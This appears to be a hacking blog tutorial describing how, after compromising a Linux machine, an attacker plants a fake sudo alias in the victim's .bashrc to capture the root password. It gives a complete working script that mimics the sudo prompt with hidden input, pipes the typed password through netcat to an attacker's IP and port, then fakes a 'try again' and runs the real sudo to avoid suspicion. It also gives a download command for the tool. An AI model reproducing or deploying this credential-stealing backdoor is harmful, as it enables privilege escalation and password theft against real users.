After I took control of a Linux machine, we want to do a privilege escalation, and get a root. So i started thinking how i gonna do it and i found a way to get the root password by faking the sudo command. If i would fake the sudo command, and abuse it when the user would want to execute some application as sudo, it will ask him for a root password,then the root password will send to the attacker, instead to actually execute it. Its half a social engineering attack because the user actually gives us his password but he doesnt know about it. So how i did it?
In Linux we have the .bashrc file. You can view it with by: cat ~/.bashrc . The bashrc file includes all the aliases of the user ( like the command ls that should take a parameter of color ).
Every user has a premission to change his own .bashrc file, and you can write,read,delete every alias you want.
So what I have done it’s to add an alias to the .bashrc file and name it on sudo, like the sudo command, so now when the user will do the sudo command it will get to my sudo alias.
Okay so we took control the sudo command and now we need to fake it exactly like the sudo command!, if we fail, the user will notice something wrong and we dont like to be in this situation.
So lets check the sudo command (the normal one):
quitten@ubuntu:~$ sudo asd [sudo] password for quitten:
Okay, now we see that we need to echo “[sudo] password for <username>:”, easy, but now it let us write the password with invisible chars, so how we do it? By stty command, that do the same thing as the sudo command do and let us write invisible chars. So what we got until here:
echo -en “[sudo] password for $(whoami):\r\n”;stty -echo;read pss;echo $pss
So we are doing good, but its still a suspicion that we are writing the password and nothing happens. Now we need a way to execute the real sudo command it easy, but wait. The user will need to write the password again to the real sudo command. So i thought and i get it that if we will say the user his password was “wrong” and then the real sudo command will ask him for the password. Then we did it! and success to honey pot the user.
The final code looks like this:
#!/bin/bash echo 'Welcome to Sudopot version 0.2 by Barak Tawily aka Quitten' echo "Target Username: $(whoami)" echo "Please enter attacker ip adress:" read ip echo "Port:" read port echo 'Open files and injecting code...' echo '0' > .hon CURRENT=`pwd` echo "alias sudo='aa=\$(cat $CURRENT/.hon);if [ \$aa == \"0\" ]; then echo -en \"[sudo] password for \$(whoami):\r\n\";stty -echo;read pss;echo \$pss | nc $ip $port;echo \"1\" > $CURRENT/.hon;sleep 2; echo -en \"Sorry, try again.\r\n\";echo -en \"[sudo] password for $(whoami):\r\n\";read;eval \"sudo \$sudo\";echo \"0\" > $CURRENT/.hon;stty sane;fi;'" >> ~/.bashrc echo 'Code injected.' echo -e "Please open a nc listner, sudo nc -l $ip $port\r\nHave fun while waiting...\r\nSudopot done, bye bye"
You can get the code ddirectly using:
wget http://hackingdefined.org/tools/sudohon.sh